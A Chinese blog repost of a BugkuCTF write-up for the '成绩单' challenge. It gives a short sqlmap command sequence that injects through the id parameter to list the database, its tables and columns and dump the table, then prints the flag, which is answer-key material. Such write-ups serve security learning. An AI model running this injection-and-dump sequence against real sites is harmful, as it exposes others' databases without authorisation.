BugkuCTF--成绩单 - 代码天地

BugkuCTF--成绩单

其他 2020-04-13 10:22:33 阅读次数: 0

BugkuCTF----成绩单

看提示，快来查查成绩吧。
在这里插入图片描述
进去看一下，这是个很典型的SQL注入。

应该手工就可以出来，我直接拿SQLmap跑了。
首先抓包保存一下。

掏出工具开始跑。
python2 sqlmap.py -r 1.txt -p id --current-db
-r打开这个1.txt文件
-p指定参数这个id
看到一个库 skctf_flag
在这里插入图片描述
python2 sqlmap.py -r 1.txt -p id -D skctf_flag --tables
表里有个f14g

python2 sqlmap.py -r 1.txt -p id -D skctf_flag -T fl4g --column
看一下f14g表中有什么数据。

python2 sqlmap.py -r 1.txt -p id -D skctf_flag -T fl4g -C skctf_flag --dump
在看一下skctf_flag中的值就应该能拿到flag了。
在这里插入图片描述
出来了BUGKU{Sql_INJECT0N_4813drd8hz4}

一只哈士奇ღ

发布了44 篇原创文章 · 获赞 7 · 访问量 2817

私信关注

猜你喜欢

转载自blog.csdn.net/qq_37113223/article/details/104923965

BugkuCTF--成绩单

BugkuCTF练习-成绩单

BugKuCTF WEB 成绩单

bugku 成绩单

Bugku：成绩单

BugKu——成绩单

THUSC 成绩单

成绩单

Vue成绩单

「THUSC 2016」成绩单

成绩单（详解）——bugku

thu 2016 成绩单

bugku 成绩单详解

BUGKU-----成绩单

Bugku web 成绩单

[OJ] 成绩单问题

bugkuctf--逆向入门

bugkuctf--游戏过关

bugkuctf--入门逆向

BugkuCTF--网站被黑

BugkuCTF--变量1

BugkuCTF--本地包含

BugkuCTF--矛盾

BugkuCTF--速度要快

bugku-web-成绩单

NOIP模拟成绩单（DP）

学生成绩单链表

Python成绩单雷达图

[THUSC2016]成绩单题解

P1487 失落的成绩单

今日推荐

国产云输入法——仅华为无云端数据上传安全问题

开源日报 | 工业开源项目OGG 1.0；姐姐，你要和我一起配置火狐吗；苹果AI遥遥落后？Fedora 40

开放签电子签章：停止新增，优化体验，前进更进（五一假期前工作）

开源日报 | 中学生开源前端动画引擎；全球首个Llama3 8B中文版开源模型；联想电脑恐出局；Linus讽刺AI炒作

“百模大战”必有一战 | 2024中国“百模大战”竞争格局分析

最强开源大模型 Llama 3 上架 Gitee AI

周排行

自媒体文章如何提高原创度以及如何检测原创度

开启qq邮箱的smtp服务

Qt程序单次启动（QSingleApplication类）

国外的外包网站

更新IDEA主题——放飞代码风格

cocos2dx 实现搓牌效果（翻牌效果），包括铺平动画

dict和json之间的互相转换

angular的一些思考

. Fibonacci数列是这样定义的： F[0] = 0 F[1] = 1 for each i ≥ 2: F[i] = F[i-1] + F[i-2] 因此，Fibonacci数列就形如：0, 1

洛谷P1064 金明的预算方案

每日归档

更多

2024-04-25(22)

2024-04-24(36)

2024-04-23(26)

2024-04-22(39)

2024-04-21(0)

2024-04-20(6)

2024-04-19(5)

2024-04-18(0)

2024-04-17(5)

2024-04-16(70)